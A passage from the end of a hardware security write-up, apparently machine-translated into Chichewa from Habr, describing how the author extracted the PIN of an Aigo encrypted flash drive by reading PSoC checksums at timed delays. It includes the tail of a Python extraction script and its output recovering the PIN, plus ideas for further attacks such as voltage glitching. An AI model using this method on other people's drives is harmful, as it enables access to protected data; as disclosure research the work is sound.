        0x22: "6", 0x23: "7", 0x2c: "8", 0x2d: "9"}
  last_csum = 0
  pin_bytes = []
  for delay in range(145495, 145719, 16):
    csum = csum_at(delay, 1)
    byte = (csum-last_csum)&0xFF
    print "%05d %04x (%04x) => %02x" % (delay, csum, last_csum, byte)
    pin_bytes.append(byte)
    last_csum = csum
  print "PIN: ",
  for i in range(0, len(pin_bytes)):
    if pin_bytes[i] in pin_map:
      print pin_map[pin_bytes[i]],
  print

Nazi zotsatira za kuphedwa kwake:

$ ./psoc.py 
syncing: KO OK
Resetting PSoC: KO Resetting PSoC: KO Resetting PSoC: OK
145495 53e2 (0000) => e2
145511 5407 (53e2) => 25
145527 542d (5407) => 26
145543 5454 (542d) => 27
145559 5474 (5454) => 20
145575 5495 (5474) => 21
145591 54b7 (5495) => 22
145607 54da (54b7) => 23
145623 5506 (54da) => 2c
145639 5506 (5506) => 00
145655 5533 (5506) => 2d
145671 554c (5533) => 19
145687 554e (554c) => 02
145703 554e (554e) => 00
PIN: 1 2 3 4 5 6 7 8 9

Uwu! Ntchito!

Chonde dziwani kuti mayendedwe a latency omwe ndidagwiritsa ntchito amakhala ogwirizana ndi PSoC imodzi - yomwe ndidagwiritsa ntchito.

8. Chotsatira ndi chiyani?

Chifukwa chake, tiyeni tifotokoze mwachidule mbali ya PSoC, pamayendedwe athu a Aigo drive:

  • tikhoza kuwerenga SRAM ngakhale iwerengedwa kutetezedwa;
  • Titha kudutsa chitetezo chotsutsana ndi swipe pogwiritsa ntchito kuzizira kwa boot trace ndikuwerenga mwachindunji PIN code.

Komabe, kuwukira kwathu kuli ndi zolakwika zina chifukwa cha zovuta zamalumikizidwe. Itha kuwongoleredwa motere:

  • lembani zofunikira kuti muzindikire molondola zomwe zatuluka zomwe zimapezedwa chifukwa cha "cold boot trace" kuwukira;
  • gwiritsani ntchito chida cha FPGA kuti mupange kuchedwetsa nthawi (kapena gwiritsani ntchito Arduino hardware timer);
  • yesaninso kuwukira kwina: lowetsani PIN code yolakwika mwadala, yambitsaninso ndikutaya RAM, mukuyembekeza kuti PIN yolondola idzasungidwa mu RAM poyerekeza. Komabe, izi sizosavuta kuchita pa Arduino, popeza mulingo wa chizindikiro cha Arduino ndi 5 volts, pomwe bolodi lomwe tikuwunika limagwira ntchito ndi ma 3,3 volt.

Chinthu chimodzi chosangalatsa chomwe chingayesedwe ndikusewera ndi mulingo wamagetsi kuti mulambalale chitetezo chowerengera. Ngati njirayi ingagwire ntchito, titha kupeza zolondola kwambiri kuchokera pa flash drive - m'malo modalira kuwerenga cheke ndikuchedwa kuchedwa kwa nthawi.

Popeza SROM mwina amawerenga alonda alonda kudzera pa ReadBlock system call, titha kuchita zomwezo anafotokoza pa blog ya Dmitry Nedospasov - kukhazikitsidwanso kwa kuwukira kwa Chris Gerlinski, adalengeza pamsonkhanowu. "REcon Brussels 2017".

Chinthu chinanso chosangalatsa chomwe chingachitike ndikuchotsa mlanduwo kuchokera ku chip: kutenga dambo la SRAM, kuzindikira mafoni osadziwika komanso zovuta.

9. Kutsiliza

Choncho, chitetezo cha galimotoyi chimasiya zambiri, chifukwa chimagwiritsa ntchito microcontroller yokhazikika (osati "youma") kusunga PIN code ... Komanso, sindinayang'ane (komabe) momwe zinthu zikuyendera ndi deta. kubisa pa chipangizo ichi!

Kodi mungapangire chiyani za Aigo? Nditasanthula mitundu ingapo ya ma drive osungidwa a HDD, mu 2015 ndidapanga ulaliki pa SyScan, momwe adawunikiranso zovuta zachitetezo cha ma drive angapo akunja a HDD, ndikupanga malingaliro pazomwe zingawongoleredwe. πŸ™‚

Ndinakhala kumapeto kwa sabata ziwiri ndi madzulo angapo ndikuchita kafukufukuyu. Pafupifupi maola 40. Kuwerengera kuyambira pachiyambi (pamene ndinatsegula diski) mpaka kumapeto (kutaya PIN code). Maola 40 omwewo akuphatikizapo nthawi yomwe ndinakhala ndikulemba nkhaniyi. Unali ulendo wosangalatsa kwambiri.

Source: www.habr.com

Kuwonjezera ndemanga